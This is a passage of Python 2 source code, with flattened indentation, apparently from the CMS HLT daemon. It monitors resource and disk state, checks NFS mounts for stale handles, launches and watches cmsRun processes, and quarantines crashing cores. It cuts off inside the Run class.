expected_processes = idlecount/nstreams
def updateBlacklist(blfile):
black_list=[]
active_black_list=[]
#TODO:this will be updated to read blacklist from database
if conf.role=='bu':
try:
if os.stat(blfile).st_size>0:
with open(blfile,'r') as fi:
try:
static_black_list = json.load(fi)
for item in static_black_list:
black_list.append(item)
logger.info("found these resources in " + blfile + " : " + str(black_list))
except ValueError:
logger.error("error parsing /etc/appliance/blacklist")
except:
#no blacklist file, this is ok
pass
black_list=list(set(black_list))
try:
forceUpdate=False
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
active_black_list = json.load(fi)
except:
forceUpdate=True
if forceUpdate==True or active_black_list != black_list:
try:
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'w') as fi:
json.dump(black_list,fi)
except:
return False,black_list
#TODO:check on FU if blacklisted
return True,black_list
def restartLogCollector(instanceParam):
global logCollector
if logCollector!=None:
logger.info("terminating logCollector")
logCollector.terminate()
logCollector = None
logger.info("starting logcollector.py")
logcollector_args = ['/opt/hltd/python/logcollector.py']
logcollector_args.append(instanceParam)
logCollector = subprocess.Popen(logcollector_args,preexec_fn=preexec_function,close_fds=True)
class system_monitor(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.running = True
self.hostname = os.uname()[1]
self.directory = []
self.file = []
self.rehash()
self.create_file=True
self.threadEvent = threading.Event()
self.threadEventStat = threading.Event()
self.statThread = None
self.stale_flag=False
self.boxdoc_version = boxdoc_version
if conf.mount_control_path:
self.startStatNFS()
def rehash(self):
if conf.role == 'fu':
self.check_directory = [os.path.join(x,'appliance','dn') for x in bu_disk_list_ramdisk_instance]
#write only in one location
if conf.mount_control_path:
logger.info('Updating box info via control interface')
self.directory = [os.path.join(bu_disk_ramdisk_CI_instance,'appliance','boxes')]
else:
logger.info('Updating box info via data interface')
self.directory = [os.path.join(bu_disk_list_ramdisk_instance[0],'appliance','boxes')]
self.check_file = [os.path.join(x,self.hostname) for x in self.check_directory]
else:
self.directory = [os.path.join(conf.watch_directory,'appliance/boxes/')]
try:
#if directory does not exist: check if it is renamed to specific name (non-main instance)
if not os.path.exists(self.directory[0]) and conf.instance=="main":
os.makedirs(self.directory[0])
except OSError:
pass
self.file = [os.path.join(x,self.hostname) for x in self.directory]
logger.info("system_monitor: rehash found the following BU disk(s):"+str(self.file))
for disk in self.file:
logger.info(disk)
def startStatNFS(self):
if conf.role == "fu":
self.statThread = threading.Thread(target = self.runStatNFS)
self.statThread.start()
def runStatNFS(self):
fu_stale_counter=0
fu_stale_counter2=0
while self.running:
if conf.mount_control_path:
self.threadEventStat.wait(2)
time_start = time.time()
err_detected = False
try:
#check for NFS stale file handle
for disk in bu_disk_list_ramdisk:
mpstat = os.stat(disk)
for disk in bu_disk_list_output:
mpstat = os.stat(disk)
if bu_disk_ramdisk_CI:
disk = bu_disk_ramdisk_CI
mpstat = os.stat(disk)
#no issue if we reached this point
fu_stale_counter = 0
except (IOError,OSError) as ex:
err_detected=True
if ex.errno == 116:
if fu_stale_counter==0 or fu_stale_counter%500==0:
logger.fatal('detected stale file handle: '+str(disk))
else:
logger.warning('stat mountpoint ' + str(disk) + ' caught Error: '+str(ex))
fu_stale_counter+=1
err_detected=True
except Exception as ex:
err_detected=True
logger.warning('stat mountpoint ' + str(disk) + ' caught exception: '+str(ex))
#if stale handle checks passed, check if write access and timing are normal
#for all data network ramdisk mountpoints
if conf.mount_control_path and not err_detected:
try:
for mfile in self.check_file:
with open(mfile,'w') as fp:
fp.write('{}')
fu_stale_counter2 = 0
#os.stat(mfile)
except IOError as ex:
err_detected = True
fu_stale_counter2+=1
if ex.errno==2:
#still an error if htld on BU did not create 'appliance/dn' dir
if fu_stale_counter2==0 or fu_stale_counter2%20==0:
logger.warning('unable to update '+mfile+ ' : '+str(ex))
else:
logger.error('update file ' + mfile + ' caught Error:'+str(ex))
except Exception as ex:
err_detected = True
logger.error('update file ' + mfile + ' caught exception:'+str(ex))
#measure time needed to do these actions. stale flag is set if it takes more than 10 seconds
stat_time_delta = time.time()-time_start
if stat_time_delta>5:
if conf.mount_control_path:
logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform file handle and boxinfo stat check")
else:
logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform stale file handle check")
if stat_time_delta>5 or err_detected:
self.stale_flag=True
else:
#clear stale flag if successful
self.stale_flag=False
#no loop if called inside main loop
if not conf.mount_control_path:
return
def run(self):
try:
logger.debug('entered system monitor thread ')
global suspended
global ramdisk_submount_size
global masked_resources
res_path_temp = os.path.join(conf.watch_directory,'appliance','resource_summary_temp')
res_path = os.path.join(conf.watch_directory,'appliance','resource_summary')
selfhost = os.uname()[1]
boxinfo_update_attempts=0
counter=0
while self.running:
self.threadEvent.wait(5 if counter>0 else 1)
counter+=1
counter=counter%5
if suspended:continue
tstring = datetime.datetime.utcfromtimestamp(time.time()).isoformat()
ramdisk = None
if conf.role == 'bu':
ramdisk = os.statvfs(conf.watch_directory)
ramdisk_occ=1
try:ramdisk_occ = float((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)/float(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)
except:pass
if ramdisk_occ<0:
ramdisk_occ=0
logger.info('incorrect ramdisk occupancy',ramdisk_occ)
if ramdisk_occ>1:
ramdisk_occ=1
logger.info('incorrect ramdisk occupancy',ramdisk_occ)
#init
resource_count_idle = 0
resource_count_used = 0
resource_count_broken = 0
resource_count_quarantined = 0
resource_count_stale = 0
resource_count_pending = 0
resource_count_activeRun = 0
cloud_count = 0
lastFURuns = []
lastFUrun=-1
activeRunQueuedLumisNum = -1
activeRunCMSSWMaxLumi = -1
active_res = 0
fu_data_alarm=False
current_time = time.time()
stale_machines = []
try:
current_runnumber = runList.getLastRun().runnumber
except:
current_runnumber=0
for key in boxinfoFUMap:
if key==selfhost:continue
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:continue #deleted?
if current_time - etime > 10 or edata == None: continue
try:
try:
if edata['version']!=self.boxdoc_version:
logger.warning('box file version mismatch from '+str(key)+' got:'+str(edata['version'])+' required:'+str(self.boxdoc_version))
continue
except:
logger.warning('box file version for '+str(key)+' not found')
continue
if edata['detectedStaleHandle']:
stale_machines.append(str(key))
resource_count_stale+=edata['idles']+edata['used']+edata['broken']
else:
if current_runnumber in edata['activeRuns']:
resource_count_activeRun += edata['used_activeRun']+edata['broken_activeRun']
active_addition =0
if edata['cloudState'] == "resourcesReleased":
resource_count_pending += edata['idles']
else:
resource_count_idle+=edata['idles']
active_addition+=edata['idles']
active_addition+=edata['used']
resource_count_used+=edata['used']
resource_count_broken+=edata['broken']
resource_count_quarantined+=edata['quarantined']
#active resources reported to BU if cloud state is off
if edata['cloudState'] == "off":
active_res+=active_addition
cloud_count+=edata['cloud']
fu_data_alarm = edata['fuDataAlarm'] or fu_data_alarm
except Exception as ex:
logger.warning('problem updating boxinfo summary: '+str(ex))
try:
lastFURuns.append(edata['activeRuns'][-1])
except:pass
if len(stale_machines) and counter==1:
logger.warning("detected stale box resources: "+str(stale_machines))
fuRuns = sorted(list(set(lastFURuns)))
if len(fuRuns)>0:
lastFUrun = fuRuns[-1]
#second pass
for key in boxinfoFUMap:
if key==selfhost:continue
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:continue #deleted?
if current_time - etime > 10 or edata == None: continue
try:
try:
if edata['version']!=self.boxdoc_version: continue
except: continue
lastrun = edata['activeRuns'][-1]
if lastrun==lastFUrun:
qlumis = int(edata['activeRunNumQueuedLS'])
if qlumis>activeRunQueuedLumisNum:activeRunQueuedLumisNum=qlumis
maxcmsswls = int(edata['activeRunCMSSWMaxLS'])
if maxcmsswls>activeRunCMSSWMaxLumi:activeRunCMSSWMaxLumi=maxcmsswls
except:pass
res_doc = {
"active_resources":active_res,
"active_resources_activeRun":resource_count_activeRun,
#"active_resources":resource_count_activeRun,
"idle":resource_count_idle,
"used":resource_count_used,
"broken":resource_count_broken,
"quarantined":resource_count_quarantined,
"stale_resources":resource_count_stale,
"cloud":cloud_count,
"pending_resources":resource_count_pending,
"activeFURun":lastFUrun,
"activeRunNumQueuedLS":activeRunQueuedLumisNum,
"activeRunCMSSWMaxLS":activeRunCMSSWMaxLumi,
"ramdisk_occupancy":ramdisk_occ,
"fuDiskspaceAlarm":fu_data_alarm
}
with open(res_path_temp,'w') as fp:
json.dump(res_doc,fp,indent=True)
os.rename(res_path_temp,res_path)
res_doc['fm_date']=tstring
try:boxInfo.ec.injectSummaryJson(res_doc)
except:pass
for mfile in self.file:
if conf.role == 'fu':
#check if stale file handle (or slow access)
if not conf.mount_control_path:
self.runStatNFS()
if fu_watchdir_is_mountpoint:
dirstat = os.statvfs(conf.watch_directory)
d_used = ((dirstat.f_blocks - dirstat.f_bavail)*dirstat.f_bsize)>>20,
d_total = (dirstat.f_blocks*dirstat.f_bsize)>>20,
else:
p = subprocess.Popen("du -s --exclude " + ES_DIR_NAME + " --exclude mon --exclude open " + str(conf.watch_directory), shell=True, stdout=subprocess.PIPE)
p.wait()
std_out=p.stdout.read()
out = std_out.split('\t')[0]
d_used = int(out)>>10
d_total = conf.max_local_disk_usage
lastrun = runList.getLastRun()
n_used_activeRun=0
n_broken_activeRun=0
try:
#if cloud_mode==True and entering_cloud_mode==True:
# n_idles = 0
# n_used = 0
# n_broken = 0
# n_cloud = len(os.listdir(cloud))+len(os.listdir(idles))+len(os.listdir(used))+len(os.listdir(broken))
#else:
usedlist = os.listdir(used)
brokenlist = os.listdir(broken)
if lastrun:
try:
n_used_activeRun = lastrun.countOwnedResourcesFrom(usedlist)
n_broken_activeRun = lastrun.countOwnedResourcesFrom(brokenlist)
except:pass
n_idles = len(os.listdir(idles))
n_used = len(usedlist)
n_broken = len(brokenlist)
n_cloud = len(os.listdir(cloud))
global num_excluded
n_quarantined = len(os.listdir(quarantined))-num_excluded
if n_quarantined<0: n_quarantined=0
numQueuedLumis,maxCMSSWLumi=self.getLumiQueueStat()
cloud_state = "off"
if cloud_mode:
if entering_cloud_mode: cloud_state="starting"
elif exiting_cloud_mode:cloud_state="stopping"
else: cloud_state="on"
elif resources_blocked_flag:
cloud_state = "resourcesReleased"
elif masked_resources:
cloud_state = "resourcesMasked"
else:
cloud_state = "off"
boxdoc = {
'fm_date':tstring,
'idles' : n_idles,
'used' : n_used,
'broken' : n_broken,
'used_activeRun' : n_used_activeRun,
'broken_activeRun' : n_broken_activeRun,
'cloud' : n_cloud,
'quarantined' : n_quarantined,
'usedDataDir' : d_used,
'totalDataDir' : d_total,
'fuDataAlarm' : d_used > 0.9*d_total,
'activeRuns' : runList.getActiveRunNumbers(),
'activeRunNumQueuedLS':numQueuedLumis,
'activeRunCMSSWMaxLS':maxCMSSWLumi,
'activeRunStats':runList.getStateDoc(),
'cloudState':cloud_state,
'detectedStaleHandle':self.stale_flag,
'version':self.boxdoc_version
}
with open(mfile,'w+') as fp:
json.dump(boxdoc,fp,indent=True)
boxinfo_update_attempts=0
except (IOError,OSError) as ex:
logger.warning('boxinfo file write failed :'+str(ex))
#detecting stale file handle on recreated loop fs and remount
if conf.instance!='main' and (ex.errno==116 or ex.errno==2) and boxinfo_update_attempts>=5:
boxinfo_update_attempts=0
try:os.unlink(os.path.join(conf.watch_directory,'suspend0'))
except:pass
with open(os.path.join(conf.watch_directory,'suspend0'),'w'):
pass
time.sleep(1)
boxinfo_update_attempts+=1
except Exception as ex:
logger.warning('exception on boxinfo file write failed : +'+str(ex))
if conf.role == 'bu':
outdir = os.statvfs('/fff/output')
boxdoc = {
'fm_date':tstring,
'usedRamdisk':((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)>>20,
'totalRamdisk':(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)>>20,
'usedOutput':((outdir.f_blocks - outdir.f_bavail)*outdir.f_bsize)>>20,
'totalOutput':(outdir.f_blocks*outdir.f_bsize)>>20,
'activeRuns':runList.getActiveRunNumbers(),
"version":self.boxdoc_version
}
with open(mfile,'w+') as fp:
json.dump(boxdoc,fp,indent=True)
except Exception as ex:
logger.exception(ex)
for mfile in self.file:
try:
os.remove(mfile)
except OSError:
pass
logger.debug('exiting system monitor thread ')
def getLumiQueueStat(self):
try:
with open(os.path.join(conf.watch_directory,'run'+str(runList.getLastRun().runnumber).zfill(conf.run_number_padding),
'open','queue_status.jsn'),'r') as fp:
#fcntl.flock(fp, fcntl.LOCK_EX)
statusDoc = json.load(fp)
return str(statusDoc["numQueuedLS"]),str(statusDoc["CMSSWMaxLS"])
except:
return "-1","-1"
def stop(self):
logger.debug("system_monitor: request to stop")
self.running = False
self.threadEvent.set()
self.threadEventStat.set()
if self.statThread:
self.statThread.join()
class BUEmu:
def __init__(self):
self.process=None
self.runnumber = None
def startNewRun(self,nr):
if self.runnumber:
logger.error("Another BU emulator run "+str(self.runnumber)+" is already ongoing")
return
self.runnumber = nr
configtouse = conf.test_bu_config
destination_base = None
if role == 'fu':
destination_base = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
else:
destination_base = conf.watch_directory
if "_patch" in conf.cmssw_default_version:
full_release="cmssw-patch"
else:
full_release="cmssw"
new_run_args = [conf.cmssw_script_location+'/startRun.sh',
conf.cmssw_base,
conf.cmssw_arch,
conf.cmssw_default_version,
conf.exec_directory,
full_release,
'null',
configtouse,
str(nr),
'/tmp', #input dir is not needed
destination_base,
'1',
'1']
try:
self.process = subprocess.Popen(new_run_args,
preexec_fn=preexec_function,
close_fds=True
)
except Exception as ex:
logger.error("Error in forking BU emulator process")
logger.error(ex)
def stop(self):
os.kill(self.process.pid,SIGINT)
self.process.wait()
self.runnumber=None
bu_emulator=BUEmu()
class OnlineResource:
def __init__(self,parent,resourcenames,lock):
self.parent = parent
self.hoststate = 0 #@@MO what is this used for?
self.cpu = resourcenames
self.process = None
self.processstate = None
self.watchdog = None
self.runnumber = None
self.assigned_run_dir = None
self.lock = lock
self.retry_attempts = 0
self.quarantined = []
def ping(self):
if conf.role == 'bu':
if not os.system("ping -c 1 "+self.cpu[0])==0: pass #self.hoststate = 0
def NotifyNewRunStart(self,runnumber):
self.runnumber = runnumber
self.notifyNewRunThread = threading.Thread(target = self.NotifyNewRun,args=[runnumber])
self.notifyNewRunThread.start()
def NotifyNewRunJoin(self):
self.notifyNewRunThread.join()
self.notifyNewRunThread=None
def NotifyNewRun(self,runnumber):
self.runnumber = runnumber
logger.info("calling start of run on "+self.cpu[0])
attemptsLeft=3
while attemptsLeft>0:
attemptsLeft-=1
try:
connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - conf.cgi_instance_port_offset,timeout=10)
connection.request("GET",'cgi-bin/start_cgi.py?run='+str(runnumber))
response = connection.getresponse()
#do something intelligent with the response code
logger.error("response was "+str(response.status))
if response.status > 300: self.hoststate = 1
else:
logger.info(response.read())
break
except Exception as ex:
if attemptsLeft>0:
logger.error(str(ex))
logger.info('retrying connection to '+str(self.cpu[0]))
else:
logger.error('Exhausted attempts to contact '+str(self.cpu[0]))
logger.exception(ex)
def NotifyShutdown(self):
try:
connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - self.cgi_instance_port_offset,timeout=5)
connection.request("GET",'cgi-bin/stop_cgi.py?run='+str(self.runnumber))
time.sleep(0.05)
response = connection.getresponse()
time.sleep(0.05)
#do something intelligent with the response code
#if response.status > 300: self.hoststate = 0
except Exception as ex:
logger.exception(ex)
def StartNewProcess(self ,runnumber, startindex, arch, version, menu,transfermode,num_threads,num_streams):
logger.debug("OnlineResource: StartNewProcess called")
self.runnumber = runnumber
"""
this is just a trick to be able to use two
independent mounts of the BU - it should not be necessary in due course
IFF it is necessary, it should address "any" number of mounts, not just 2
"""
input_disk = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
inputdirpath = os.path.join(input_disk,'run'+str(runnumber).zfill(conf.run_number_padding))
#run_dir = input_disk + '/run' + str(self.runnumber).zfill(conf.run_number_padding)
logger.info("starting process with "+version+" and run number "+str(runnumber)+ ' threads:'+str(num_threads)+' streams:'+str(num_streams))
if "_patch" in version:
full_release="cmssw-patch"
else:
full_release="cmssw"
if not conf.dqm_machine:
new_run_args = [conf.cmssw_script_location+'/startRun.sh',
conf.cmssw_base,
arch,
version,
conf.exec_directory,
full_release,
menu,
transfermode,
str(runnumber),
input_disk,
conf.watch_directory,
str(num_threads),
str(num_streams)]
else: # a dqm machine
dqm_globalrun_file = input_disk + '/' + dqm_globalrun_filepattern.format(str(runnumber).zfill(conf.run_number_padding))
runkey = ''
try:
with open(dqm_globalrun_file, 'r') as f:
for line in f:
runkey = re.search(r'\s*run_key\s*=\s*([0-9A-Za-z_]*)', line, re.I)
if runkey:
runkey = runkey.group(1).lower()
break
except IOError,ex:
logging.exception(ex)
logging.info("the default run key will be used for the dqm jobs")
new_run_args = [conf.cmssw_script_location+'/startDqmRun.sh',
conf.cmssw_base,
arch,
conf.exec_directory,
str(runnumber),
input_disk,
used+self.cpu[0]]
if self.watchdog:
new_run_args.append('skipFirstLumis=True')
if runkey:
new_run_args.append('runkey={0}'.format(runkey))
else:
logging.info('Not able to determine the DQM run key from the "global" file. Default value from the input source will be used.')
try:
# dem = demote.demote(conf.user)
self.process = subprocess.Popen(new_run_args,
preexec_fn=preexec_function,
close_fds=True
)
logger.info("arg array "+str(new_run_args).translate(None, "'")+' started with pid '+str(self.process.pid))
# time.sleep(1.)
if self.watchdog==None:
self.processstate = 100
self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
self.watchdog.start()
logger.debug("watchdog thread for "+str(self.process.pid)+" is alive "
+ str(self.watchdog.is_alive()))
else:
#release lock while joining thread to let it complete
resource_lock.release()
self.watchdog.join()
resource_lock.acquire()
self.processstate = 100
self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
self.watchdog.start()
logger.debug("watchdog thread restarted for "+str(self.process.pid)+" is alive "
+ str(self.watchdog.is_alive()))
except Exception as ex:
logger.info("OnlineResource: exception encountered in forking hlt slave")
logger.info(ex)
def join(self):
logger.debug('calling join on thread ' +self.watchdog.name)
self.watchdog.join()
def clearQuarantined(self,doLock=True,restore=True):
global q_list
retq=[]
if not restore:
q_list+=self.quarantined
return self.quarantined
if doLock:resource_lock.acquire()
try:
for cpu in self.quarantined:
logger.info('Clearing quarantined resource '+cpu)
os.rename(quarantined+cpu,idles+cpu)
retq.append(cpu)
self.quarantined = []
self.parent.n_used=0
self.parent.n_quarantined=0
except Exception as ex:
logger.exception(ex)
if doLock:resource_lock.release()
return retq
class ProcessWatchdog(threading.Thread):
def __init__(self,resource,lock,inputdirpath):
threading.Thread.__init__(self)
self.resource = resource
self.lock = lock
self.inputdirpath=inputdirpath
self.retry_limit = conf.process_restart_limit
self.retry_delay = conf.process_restart_delay_sec
self.quarantined = False
def run(self):
try:
logger.info('watchdog thread for process '+str(self.resource.process.pid) + ' on resource '+str(self.resource.cpu)+" for run "+str(self.resource.runnumber) + ' started ')
self.resource.process.wait()
returncode = self.resource.process.returncode
pid = self.resource.process.pid
#update json process monitoring file
self.resource.processstate=returncode
outdir = self.resource.assigned_run_dir
abortedmarker = os.path.join(outdir,Run.ABORTED)
stoppingmarker = os.path.join(outdir,Run.STOPPING)
abortcompletemarker = os.path.join(outdir,Run.ABORTCOMPLETE)
completemarker = os.path.join(outdir,Run.COMPLETE)
rnsuffix = str(self.resource.runnumber).zfill(conf.run_number_padding)
if os.path.exists(abortedmarker):
resource_lock.acquire()
#release resources
try:
for cpu in self.resource.cpu:
try:
os.rename(used+cpu,idles+cpu)
self.resource.parent.n_used-=1
except Exception as ex:
logger.exception(ex)
except:pass
resource_lock.release()
return
#input dir check if cmsRun can not find the input
inputdir_exists = os.path.exists(self.inputdirpath)
configuration_reachable = False if conf.dqm_machine==False and returncode==90 and not inputdir_exists else True
if conf.dqm_machine==False and returncode==90 and inputdir_exists:
if not os.path.exists(os.path.join(self.inputdirpath,'hlt','HltConfig.py')):
logger.error("input run dir exists, but " + str(os.path.join(self.inputdirpath,'hlt','HltConfig.py')) + " is not present (cmsRun exit code 90)")
configuration_reachable=False
#cleanup actions- remove process from list and attempt restart on same resource
if returncode != 0 and returncode!=None and configuration_reachable:
#bump error count in active_runs_errors which is logged in the box file
self.resource.parent.num_errors+=1
if returncode < 0:
logger.error("process "+str(pid)
+" for run "+str(self.resource.runnumber)
+" on resource(s) " + str(self.resource.cpu)
+" exited with signal "
+str(returncode) + ', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
)
else:
logger.error("process "+str(pid)
+" for run "+str(self.resource.runnumber)
+" on resource(s) " + str(self.resource.cpu)
+" exited with code "
+str(returncode) +', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
)
#quit codes (configuration errors):
quit_codes = [127,90,73]
#removed 65 because it is not only configuration error
#quit_codes = [127,90,65,73]
#dqm mode will treat configuration error as a crash and eventually move to quarantined
if conf.dqm_machine==False and returncode in quit_codes:
if self.resource.retry_attempts < self.retry_limit:
logger.warning('for this type of error, restarting this process is disabled')
self.resource.retry_attempts=self.retry_limit
if returncode==127:
logger.fatal('Exit code indicates that CMSSW environment might not be available (cmsRun executable not in path).')
elif returncode==90:
logger.fatal('Exit code indicates that there might be a python error in the CMSSW configuration.')
else:
logger.fatal('Exit code indicates that there might be a C/C++ error in the CMSSW configuration.')
#generate crashed pid json file like: run000001_ls0000_crash_pid12345.jsn
oldpid = "pid"+str(pid).zfill(5)
runnumber = "run"+str(self.resource.runnumber).zfill(conf.run_number_padding)
ls = "ls0000"
filename = "_".join([runnumber,ls,"crash",oldpid])+".jsn"
filepath = os.path.join(outdir,filename)
document = {"errorCode":returncode}
try:
with open(filepath,"w+") as fi:
json.dump(document,fi)
except: logger.exception("unable to create %r" %filename)
logger.info("pid crash file: %r" %filename)
if self.resource.retry_attempts < self.retry_limit:
"""
sleep a configurable amount of seconds before
trying a restart. This is to avoid 'crash storms'
"""
time.sleep(self.retry_delay)
self.resource.process = None
self.resource.retry_attempts += 1
logger.info("try to restart process for resource(s) "
+str(self.resource.cpu)
+" attempt "
+ str(self.resource.retry_attempts))
resource_lock.acquire()
for cpu in self.resource.cpu:
os.rename(used+cpu,broken+cpu)
self.resource.parent.n_used-=1
resource_lock.release()
logger.debug("resource(s) " +str(self.resource.cpu)+
" successfully moved to except")
elif self.resource.retry_attempts >= self.retry_limit:
logger.info("process for run "
+str(self.resource.runnumber)
+" on resources " + str(self.resource.cpu)
+" reached max retry limit "
)
resource_lock.acquire()
for cpu in self.resource.cpu:
os.rename(used+cpu,quarantined+cpu)
self.resource.quarantined.append(cpu)
self.resource.parent.n_quarantined+=1
resource_lock.release()
self.quarantined=True
#write quarantined marker for RunRanger
try:
os.remove(conf.watch_directory+'/quarantined'+rnsuffix)
except:
pass
try:
with open(conf.watch_directory+'/quarantined'+rnsuffix,'w+') as fp:
pass
except Exception as ex:
logger.exception(ex)
#successful end= release resource (TODO:maybe should mark aborted for non-0 error codes)
elif returncode == 0 or returncode == None or not configuration_reachable:
if not configuration_reachable:
logger.info('pid '+str(pid)+' exit 90 (input directory and menu missing) from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
else:
logger.info('pid '+str(pid)+' exit 0 from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
# generate an end-of-run marker if it isn't already there - it will be picked up by the RunRanger
endmarker = conf.watch_directory+'/end'+rnsuffix
if not os.path.exists(endmarker):
with open(endmarker,'w+') as fp:
pass
count=0
# wait until the request to end has been handled
while not os.path.exists(stoppingmarker):
if os.path.exists(completemarker):
break
if os.path.exists(abortedmarker) or os.path.exists(abortcompletemarker):
logger.warning('quitting watchdog thread because run ' + str(self.resource.runnumber) + ' has been aborted ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
break
if not os.path.exists(outdir):
logger.warning('quitting watchdog thread because run directory ' + outdir + ' has disappeared ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
break
time.sleep(.1)
count+=1
if count>=100 and count%100==0:
logger.warning("still waiting for complete marker for run "+str(self.resource.runnumber) + ' in watchdog for resource '+str(self.resource.cpu))
# move back the resource now that it's safe since the run is marked as ended
resource_lock.acquire()
for cpu in self.resource.cpu:
try:
os.rename(used+cpu,idles+cpu)
except Exception as ex:
logger.warning('problem moving core ' + cpu + ' from used to idle:'+str(ex))
resource_lock.release()
#logger.info('exiting watchdog thread for '+str(self.resource.cpu))
except Exception as ex:
logger.info("OnlineResource watchdog: exception")
logger.exception(ex)
try:resource_lock.release()
except:pass
return
class Run:
STARTING = 'starting'
ACTIVE = 'active'
STOPPING = 'stopping'
ABORTED = 'aborted'
COMPLETE = 'complete'
ABORTCOMPLETE = 'abortcomplete'
VALID_MARKERS = [STARTING,ACTIVE,STOPPING,COMPLETE,ABORTED,ABORTCOMPLETE]
def __init__(self,nr,dirname,bu_dir,instance):
self.pending_shutdown=False
self.is_ongoing_run=True
self.num_errors = 0
self.instance = instance
self.runnumber = nr
self.dirname = dirname
self.online_resource_list = []
self.anelastic_monitor = None
self.elastic_monitor = None
self.elastic_test = None
self.arch = None
self.version = None
self.transfermode = None
self.waitForEndThread = None
self.beginTime = datetime.datetime.now()
self.anelasticWatchdog = None
self.elasticBUWatchdog = None
self.completedChecker = None
self.runShutdown = None
self.threadEvent = threading.Event()
self.stopThreads = False
#stats on usage of resources
self.n_used = 0
self.n_quarantined = 0
self.inputdir_exists = False
if conf.role == 'fu':
self.changeMarkerMaybe(Run.STARTING)
#TODO:raise from runList
# if int(self.runnumber) in active_runs:
# raise Exception("Run "+str(self.runnumber)+ "already active")
self.hlt_directory = os.path.join(bu_dir,conf.menu_directory)
self.menu_path = os.path.join(self.hlt_directory,conf.menu_name)
self.paramfile_path = os.path.join(self.hlt_directory,conf.paramfile_name)
readMenuAttempts=0
#polling for HLT menu directory
def paramsPresent():
return os.path.exists(self.hlt_directory) and os.path.exists(self.menu_path) and os.path.exists(self.paramfile_path)
paramsDetected = False
while conf.dqm_machine==False and conf.role=='fu':
if paramsPresent():
try:
with open(self.paramfile_path,'r') as fp:
fffparams = json.load(fp)
self.arch = fffparams['SCRAM_ARCH']
self.version = fffparams['CMSSW_VERSION']
self.transfermode = fffparams['TRANSFER_MODE']
paramsDetected = True
logger.info("Run " + str(self.runnumber) + " uses " + self.version + " ("+self.arch + ") with " + str(conf.menu_name) + ' transferDest:'+self.transfermode)
break
except ValueError as ex:
if readMenuAttempts>50:
logger.exception(ex)
break
except Exception as ex:
if readMenuAttempts>50:
logger.exception(ex)
break
else:
if readMenuAttempts>50:
if not os.path.exists(bu_dir):
logger.info("FFF parameter or HLT menu files not found in ramdisk - BU run directory is gone")
else:
logger.error("FFF parameter or HLT menu files not found in ramdisk")
break
readMenuAttempts+=1
time.sleep(.1)
continue
if not paramsDetected:
self.arch = conf.cmssw_arch
self.version = conf.cmssw_default_version
self.menu_path = conf.test_hlt_config1
self.transfermode = 'null'
if conf.role=='fu':
logger.warning("Using default values for run " + str(self.runnumber) + ": " + self.version + " (" + self.arch + ") with " + self.menu_path)
#give this command line parameter quoted in case it is empty
if len(self.transfermode)==0:
self.transfermode='null'
#backup HLT menu and parameters
if conf.role=='fu':
try:
hltTargetName = 'HltConfig.py_run'+str(self.runnumber)+'_'+self.arch+'_'+self.version+'_'+self.transfermode
shutil.copy(self.menu_path,os.path.join(conf.log_dir,'pid',hltTargetName))
except:
logger.warning('Unable to backup HLT menu')
self.rawinputdir = None
#
if conf.role == "bu":
try:
self.rawinputdir = conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
os.stat(self.rawinputdir)
self.inputdir_exists = True
except Exception, ex:
logger.error("failed to stat "+self.rawinputdir)
try:
os.mkdir(self.rawinputdir+'/mon')
except Exception, ex:
logger.error("could not create mon dir inside the run input directory")
else:
self.rawinputdir= os.path.join(bu_disk_list_ramdisk_instance[0],'run' + str(self.runnumber).zfill(conf.run_number_padding))
#verify existence of the input directory
if conf.role=='fu':
if not paramsDetected and conf.dqm_machine==False:
try:
os.stat(self.rawinputdir)
self.inputdir_exists = True
except:
logger.warning("unable to stat raw input directory for run "+str(self.runnumber))
return
else:
self.inputdir_exists = True
self.lock = threading.Lock()
if conf.use_elasticsearch == True:
global nsslock
try:
if conf.role == "bu":
nsslock.acquire()
logger.info("starting elasticbu.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/elasticbu.py',self.instance,str(self.runnumber)]
else:
logger.info("starting elastic.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/elastic.py',self.dirname,self.rawinputdir+'/mon',str(expected_processes)]
self.elastic_monitor = subprocess.Popen(elastic_args,
preexec_fn=preexec_function,
close_fds=True
)
except OSError as ex:
logger.error("failed to start elasticsearch client")
logger.error(ex)
try:nsslock.release()
except:pass
if conf.role == "fu" and conf.dqm_machine==False:
try:
logger.info("starting anelastic.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/anelastic.py',self.dirname,str(self.runnumber), self.rawinputdir,bu_disk_list_output_instance[0]]
self.anelastic_monitor = subprocess.Popen(elastic_args,
preexec_fn=preexec_function,
close_fds=True
)
except OSError as ex:
logger.fatal("failed to start anelastic.py client:")
logger.exception(ex)
sys.exit(1)
def __del__(self):
self.stopThreads=True
self.threadEvent.set()
if self.completedChecker:
try:
self.completedChecker.join()
except RuntimeError:
pass
if self.elasticBUWatchdog:
try:
self.elasticBUWatchdog.join()
except RuntimeError:
pass
if self.runShutdown:
self.joinShutdown()
logger.info('Run '+ str(self.runnumber) +' object __del__ has completed')
def countOwnedResourcesFrom(self,resourcelist):
ret = 0
